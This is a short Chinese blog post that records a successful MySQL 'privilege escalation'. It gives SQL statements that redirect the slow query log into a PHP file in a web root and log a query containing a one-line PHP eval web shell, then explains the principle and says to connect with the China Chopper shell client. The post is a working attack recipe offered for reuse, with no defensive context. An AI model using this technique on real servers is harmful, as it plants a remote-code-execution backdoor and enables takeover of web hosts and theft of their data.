mysql提权记录,mysql日志提权

成功提权,记录一下,具体执行sql:

set GLOBAL slow_query_log =1;
set GLOBAL long_query_time =1;
set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php';
SELECT "<?php eval($_POST['a']);?>" or sleep(11);

原理:设置sql慢查询的秒数,执行超时会把sql保存为文件,我们把查询语句改为php代码即可,然后上菜刀即可。

访客
邮箱
网址

Top